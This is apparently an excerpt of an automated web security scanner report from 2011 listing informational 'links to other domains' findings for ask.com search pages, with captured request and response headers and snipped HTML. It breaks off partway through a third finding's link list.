<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1174503742?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.29. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=Which+American+Idol+has+sold+the+most+albums%3F&gc=1&qsrc=3045&o=0&l=dir&qqa=Chris+Daughtry

The response contains the following links to other domains:

http://66.235.120.66/ts?t=14083839053907667709
http://66.235.120.66/ts?t=6827936094371587005
http://66.235.120.67/e?t=10994044785878645472
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=Which+American+Idol+has+sold+the+most+albums%3F
http://asksupport.custhelp.com/app/answers/list
http://askville.amazon.com/american-idol-sold-number-albums/AnswerViewer.do?requestId=34020
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://c.moreover.com/click/here.pl?z3979452882&z=1250248826
http://c.moreover.com/click/here.pl?z3982596807&z=1250248826
http://c.moreover.com/click/here.pl?z3983014740&z=1250248834
http://en.wikipedia.org/wiki/American_Idol
http://en.wikipedia.org/wiki/Carrie_Underwood
http://en.wikipedia.org/wiki/File:American_Idol_logo.png
http://en.wikipedia.org/wiki/File:CarrieUnderwoodNov09.jpg
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=;u4=;u3=;u2=0;ord=-308182071?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://twitter.com/share
http://wiki.answers.com/Q/What_american_idol_contestant_has_sold_the_most_albums
http://www.americanidol.com/
http://www.chacha.com/question/which-american-idol-has-sold-the-most-albums
http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ask.com%2Fqotdfbshare%3Fq%3DWhich+American+Idol+has+sold+the+most+albums%3F%26imgu%3Dhttp%3A%2F%2Fsp.ask.com%2Fqotdxdict%2Fi%2F20110127.jpg&t=Ask.com%27s+Question+of+the+Day+Challenge
http://www.factmonster.com/entertainment/music/american-idol-bestsellers.html
http://www.gossipnewz.com/gossip_news/2009/03/chart-watch-extra-the-american-idol-alumni-association/
http://www.istockphoto.com/stock-photo-3014285-on-stage.php

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:44 GMT; Path=/
Set-Cookie: clc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:44 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296155624688; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:44 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-V2hpY2grQW1lcmljYW4rSWRvbCtoYXMrc29sZCt0aGUrbW9zdCthbGJ1bXMlM0Y.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQ0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
Content-Length: 128845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>


<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Which+American+Idol+has+sold+the+most+albums%3F"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<div id="qotd-img">

<a href="http://www.istockphoto.com/stock-photo-3014285-on-stage.php" style="display:block;outline:none; height:100px;" target="_blank" onclick="sct(53228, this);">
<img src="http://sp.ask.com/qotdxdict/i/20110127.jpg" alt=""/>
...[SNIP]...
<div style="text-align:center;line-height:10px;">

<a href="http://www.istockphoto.com/stock-photo-3014285-on-stage.php" target="_blank" class="txt0 info l_nu" onclick="sct(53228, this);">source</a>
...[SNIP]...
<div id="qotdtwt">
<a href="http://twitter.com/share" class="twitter-share-button" target="_blank" style="display:none;" rel="external" data-count="none" data-text="Which American Idol has sold the most albums?" data-via="AskDotCom">Tweet</a>
...[SNIP]...
<div id="qotdfb">
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ask.com%2Fqotdfbshare%3Fq%3DWhich+American+Idol+has+sold+the+most+albums%3F%26imgu%3Dhttp%3A%2F%2Fsp.ask.com%2Fqotdxdict%2Fi%2F20110127.jpg&t=Ask.com%27s+Question+of+the+Day+Challenge" class="fbsm title" onmousedown="JASK.serp.qotd.logPickClick(this,52447, {en:'qotd',io:'0',b:'a001',tp:'171',ec:'1'});" target="_blank" style="display:block;"></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="r_t1"><a onmousedown="return pk(this,{en:'afd',io:'0',b:'a002',tp:'d',ec:'1'})" href="http://askville.amazon.com/american-idol-sold-number-albums/AnswerViewer.do?requestId=34020" class="title txt_lg" ><b>
...[SNIP]...
<div id="r_t2"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a003',tp:'d',ec:'1'})" href="http://www.chacha.com/question/which-american-idol-has-sold-the-most-albums" class="title txt_lg" ><b>
...[SNIP]...
e="padding-top:5px;">

<a onmousedown="return pk(this,{en:'ni',io:'0',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3982596807&amp;z=1250248826" onmouseover="return ss('http://www.associatedcontent.com/article/7686182/adam_lambert_is_overtaking_the_other.html')" onmouseout="cs()" >

<img src="http://66.235.120.67:80/e?t=10994044785878645472" alt="" border="0" height="50" style="border:solid 1px #ccc">

</a>
...[SNIP]...
<div class="T3" style="text-align:center">
<a class="L3" onmousedown="return pk(this,{en:'ni',io:'0',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3982596807&amp;z=1250248826" onmouseover="return ss('http://www.associatedcontent.com/article/7686182/adam_lambert_is_overtaking_the_other.html')" onmouseout="cs()" >Source</a>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'0',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3982596807&amp;z=1250248826" onmouseover="return ss('http://www.associatedcontent.com/article/7686182/adam_lambert_is_overtaking_the_other.html')" onmouseout="cs()" >ADAM LAMBERT is OVERTAKING the OTHER <b>
...[SNIP]...
<div class="pl10">

<a class="txt3 title" onmousedown="return pk(this,{en:'ns',io:'1',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3983014740&amp;z=1250248834" onmouseover="return ss('http://www.examiner.com/tv-in-national/adam-lambert-love-for-his-musical-friends')" onmouseout="cs()" >Adam Lambert -- love for his musical friends</a>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'2',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3979452882&amp;z=1250248826" onmouseover="return ss('http://www.examiner.com/tv-in-national/adam-lambert-singer-meets-fans-at-store-talks-life-after-american-idol')" onmouseout="cs()" >Adam Lambert: Singer meets fans at store, talks life after '<b>
...[SNIP]...
<div id="r_t4"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a005',tp:'d',ec:'1'})" href="http://wiki.answers.com/Q/What_american_idol_contestant_has_sold_the_most_albums" class="title txt_lg" >What <b>
...[SNIP]...
<a href="http://www.ask.com/wiki/American_Idol" onmousedown="return fp(this,{en:'sx',io:'1',b:'a006',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)">
<img id="wiki5"
style="border:1px solid #0066CC;"
src="http://66.235.120.66/ts?t=6827936094371587005"
height="45" alt="" border="0"></a>

<a class="L3" href="http://en.wikipedia.org/wiki/File:American_Idol_logo.png" onmousedown="return fp(this,{en:'sx',io:'2',b:'a006',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)" >Source</a>
...[SNIP]...
</b> . Debu...

<a href="http://en.wikipedia.org/wiki/American_Idol" onmousedown="return pk(this,{en:'vwki',io:'5',b:'a006',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2" style="white-space:nowrap" target="_blank">View article on Wikipedia »</a>
...[SNIP]...
<a href="http://www.ask.com/wiki/Carrie_Underwood" onmousedown="return fp(this,{en:'sx',io:'1',b:'a007',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)">
<img id="wiki6"
style="border:1px solid #0066CC;"
src="http://66.235.120.66/ts?t=14083839053907667709"
height="45" alt="" border="0"></a>

<a class="L3" href="http://en.wikipedia.org/wiki/File:CarrieUnderwoodNov09.jpg" onmousedown="return fp(this,{en:'sx',io:'2',b:'a007',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)" >Source</a>
...[SNIP]...
</b> since become a...

<a href="http://en.wikipedia.org/wiki/Carrie_Underwood" onmousedown="return pk(this,{en:'vwki',io:'6',b:'a007',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2" style="white-space:nowrap" target="_blank">View article on Wikipedia »</a>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.gossipnewz.com/gossip_news/2009/03/chart-watch-extra-the-american-idol-alumni-association/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >‘<b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.factmonster.com/entertainment/music/american-idol-bestsellers.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >Best-<b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.americanidol.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Official Site for Videos, Photos, Community - <b>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=;u4=;u3=;u2=0;ord=-308182071?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.30. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=Which+American+Idol+has+sold+the+most+albums%3F&gc=1&qsrc=3045&o=0&l=dir&qqa=Chris+Daughtry

The response contains the following links to other domains:

http://66.235.120.66/ts?t=14083839053907667709
http://66.235.120.66/ts?t=6827936094371587005
http://66.235.120.67/e?t=10994044785878645472
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=Which+American+Idol+has+sold+the+most+albums%3F
http://asksupport.custhelp.com/app/answers/list
http://askville.amazon.com/american-idol-sold-number-albums/AnswerViewer.do?requestId=34020
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://c.moreover.com/click/here.pl?z3979452882&z=1250248826
http://c.moreover.com/click/here.pl?z3982596807&z=1250248826
http://c.moreover.com/click/here.pl?z3983014740&z=1250248834
http://en.wikipedia.org/wiki/American_Idol
http://en.wikipedia.org/wiki/Carrie_Underwood
http://en.wikipedia.org/wiki/File:American_Idol_logo.png
http://en.wikipedia.org/wiki/File:CarrieUnderwoodNov09.jpg
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-317014361?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://twitter.com/share
http://wiki.answers.com/Q/What_american_idol_contestant_has_sold_the_most_albums
http://www.americanidol.com/
http://www.askkids.com/?o=0&l=dir
http://www.chacha.com/question/which-american-idol-has-sold-the-most-albums
http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ask.com%2Fqotdfbshare%3Fq%3DWhich+American+Idol+has+sold+the+most+albums%3F%26imgu%3Dhttp%3A%2F%2Fsp.ask.com%2Fqotdxdict%2Fi%2F20110127.jpg&t=Ask.com%27s+Question+of+the+Day+Challenge
http://www.factmonster.com/entertainment/music/american-idol-bestsellers.html
http://www.gossipnewz.com/gossip_news/2009/03/chart-watch-extra-the-american-idol-alumni-association/
http://www.istockphoto.com/stock-photo-3014285-on-stage.php

Request

GET /web?q=Which+American+Idol+has+sold+the+most+albums%3F&gc=1&qsrc=3045&o=0&l=dir&qqa=Chris+Daughtry HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:21 GMT; Path=/
Set-Cookie: clc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:21 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:21 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.|V2hpY2grQW1lcmljYW4rSWRvbCtoYXMrc29sZCt0aGUrbW9zdCthbGJ1bXMlM0Y.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjIxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:21 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:21 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 136458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>


<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Which+American+Idol+has+sold+the+most+albums%3F"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<div id="qotd-img">

<a href="http://www.istockphoto.com/stock-photo-3014285-on-stage.php" style="display:block;outline:none; height:100px;" target="_blank" onclick="sct(53228, this);">
<img src="http://sp.ask.com/qotdxdict/i/20110127.jpg" alt=""/>
...[SNIP]...
<div style="text-align:center;line-height:10px;">

<a href="http://www.istockphoto.com/stock-photo-3014285-on-stage.php" target="_blank" class="txt0 info l_nu" onclick="sct(53228, this);">source</a>
...[SNIP]...
<div id="qotdtwt">
<a href="http://twitter.com/share" class="twitter-share-button" target="_blank" style="display:none;" rel="external" data-count="none" data-text="Which American Idol has sold the most albums?" data-via="AskDotCom">Tweet</a>
...[SNIP]...
<div id="qotdfb">
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ask.com%2Fqotdfbshare%3Fq%3DWhich+American+Idol+has+sold+the+most+albums%3F%26imgu%3Dhttp%3A%2F%2Fsp.ask.com%2Fqotdxdict%2Fi%2F20110127.jpg&t=Ask.com%27s+Question+of+the+Day+Challenge" class="fbsm title" onmousedown="JASK.serp.qotd.logPickClick(this,52447, {en:'qotd',io:'0',b:'a001',tp:'171',ec:'1'});" target="_blank" style="display:block;"></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="r_t1"><a onmousedown="return pk(this,{en:'afd',io:'0',b:'a002',tp:'d',ec:'1'})" href="http://askville.amazon.com/american-idol-sold-number-albums/AnswerViewer.do?requestId=34020" class="title txt_lg" ><b>
...[SNIP]...
<div id="r_t2"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a003',tp:'d',ec:'1'})" href="http://www.chacha.com/question/which-american-idol-has-sold-the-most-albums" class="title txt_lg" ><b>
...[SNIP]...
e="padding-top:5px;">

<a onmousedown="return pk(this,{en:'ni',io:'0',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3982596807&amp;z=1250248826" onmouseover="return ss('http://www.associatedcontent.com/article/7686182/adam_lambert_is_overtaking_the_other.html')" onmouseout="cs()" >

<img src="http://66.235.120.67:80/e?t=10994044785878645472" alt="" border="0" height="50" style="border:solid 1px #ccc">

</a>
...[SNIP]...
<div class="T3" style="text-align:center">
<a class="L3" onmousedown="return pk(this,{en:'ni',io:'0',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3982596807&amp;z=1250248826" onmouseover="return ss('http://www.associatedcontent.com/article/7686182/adam_lambert_is_overtaking_the_other.html')" onmouseout="cs()" >Source</a>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'0',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3982596807&amp;z=1250248826" onmouseover="return ss('http://www.associatedcontent.com/article/7686182/adam_lambert_is_overtaking_the_other.html')" onmouseout="cs()" >ADAM LAMBERT is OVERTAKING the OTHER <b>
...[SNIP]...
<div class="pl10">

<a class="txt3 title" onmousedown="return pk(this,{en:'ns',io:'1',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3983014740&amp;z=1250248834" onmouseover="return ss('http://www.examiner.com/tv-in-national/adam-lambert-love-for-his-musical-friends')" onmouseout="cs()" >Adam Lambert -- love for his musical friends</a>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'2',b:'a004',tp:'d',ec:'3'})" href="http://c.moreover.com/click/here.pl?z3979452882&amp;z=1250248826" onmouseover="return ss('http://www.examiner.com/tv-in-national/adam-lambert-singer-meets-fans-at-store-talks-life-after-american-idol')" onmouseout="cs()" >Adam Lambert: Singer meets fans at store, talks life after '<b>
...[SNIP]...
<div id="r_t4"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a005',tp:'d',ec:'1'})" href="http://wiki.answers.com/Q/What_american_idol_contestant_has_sold_the_most_albums" class="title txt_lg" >What <b>
...[SNIP]...
<a href="http://www.ask.com/wiki/American_Idol" onmousedown="return fp(this,{en:'sx',io:'1',b:'a006',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)">
<img id="wiki5"
style="border:1px solid #0066CC;"
src="http://66.235.120.66/ts?t=6827936094371587005"
height="45" alt="" border="0"></a>

<a class="L3" href="http://en.wikipedia.org/wiki/File:American_Idol_logo.png" onmousedown="return fp(this,{en:'sx',io:'2',b:'a006',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)" >Source</a>
...[SNIP]...
</b> . Debu...

<a href="http://en.wikipedia.org/wiki/American_Idol" onmousedown="return pk(this,{en:'vwki',io:'5',b:'a006',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2" style="white-space:nowrap" target="_blank">View article on Wikipedia »</a>
...[SNIP]...
<a href="http://www.ask.com/wiki/Carrie_Underwood" onmousedown="return fp(this,{en:'sx',io:'1',b:'a007',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)">
<img id="wiki6"
style="border:1px solid #0066CC;"
src="http://66.235.120.66/ts?t=14083839053907667709"
height="45" alt="" border="0"></a>

<a class="L3" href="http://en.wikipedia.org/wiki/File:CarrieUnderwoodNov09.jpg" onmousedown="return fp(this,{en:'sx',io:'2',b:'a007',tp:'d',ec:'2',ex:'tsrc%3DRFE'},'false',0)" >Source</a>
...[SNIP]...
</b> since become a...

<a href="http://en.wikipedia.org/wiki/Carrie_Underwood" onmousedown="return pk(this,{en:'vwki',io:'6',b:'a007',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2" style="white-space:nowrap" target="_blank">View article on Wikipedia »</a>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.factmonster.com/entertainment/music/american-idol-bestsellers.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >Best-<b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.gossipnewz.com/gossip_news/2009/03/chart-watch-extra-the-american-idol-alumni-association/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >‘<b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.americanidol.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Official Site for Videos, Photos, Community - <b>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-317014361?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.31. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=regulator+boat+north+carolina

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/COeYhe-S26YCFYjd4AodIiwR7A/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat+north+carolina
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://companydatabase.org/c/communications-services-nec/marine-operators/marine-offshore/quality-marine/north-carolina/manufacturing-facility/regulator-marine.html
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-621424867?
http://govguru.com/north-carolina/boat-registration
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir
http://www.atlanticmarinesales.com/
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html
http://www.google.com/aclk?sa=L&ai=CGb9nI8tBTaf7CYi7gwei2MTgDs-vrpsB6_PLjBLH8KqbDhACIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_Qyv_DV2La1iVL1tJkcw7qk42HVnw&num=2&sig=AGiWqtxaOv8MgTPeI42JL6EDDeR0g6r_tA&adurl=http://www.AtlanticMarineSales.com
http://www.google.com/aclk?sa=L&ai=CHdqeI8tBTaf7CYi7gwei2MTgDuHzvLwB6azIxxrnnJnKAxADIPv-gQMoBVDF95fY-v____8BYMmGgICkJMgBAaoEG0_QiobOV2PS1sRJ7TGWGwMEJqLWWyHakk3Y2w&num=3&sig=AGiWqtyvSYuz59s1BpDARImJSZq9LZHA2w&adurl=http://offshoretoys.com/listings.html
http://www.google.com/aclk?sa=L&ai=CchS6I8tBTaf7CYi7gwei2MTgDo2hwtsBtZCmiRy1kPfZJxABIPv-gQMoBVDI4ZSn_P____8BYMmGgICkJMgBAaoEGE_QuvrVV2HS1sRJtDAsI_MOyQQziZSNXg&num=1&sig=AGiWqtzwwTThUkuHNMu6mMr_A0prPX4LxQ&adurl=http://northcarolina.localguides.com/ypcyellow/controls_control_systems_regulators.html%3Futm_source%3Dgoogle_state%26utm_medium%3Dcpc%26utm_campaign%3Dypc
http://www.google.com/aclk?sa=l&ai=CB98NI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_Q6pTEV2XS18RJpTEIdJC-HlLctIc_QPiPB2THmA&num=5&ctype=4&sig=AGiWqtwXVSLugSrQroRbsAMRqCnAd48VIQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing
http://www.google.com/aclk?sa=l&ai=CO_zaI8tBTaf7CYi7gwei2MTgDo621OUB7uvvmhLdt9ykCBAEIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Jql0Vdk0tbESe0xlgoCYw_5bIx3Na9eatXRkFRY6tk&num=4&sig=AGiWqtyd8Njj9jxv-KK7-yVxjlEG70MoFg&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle
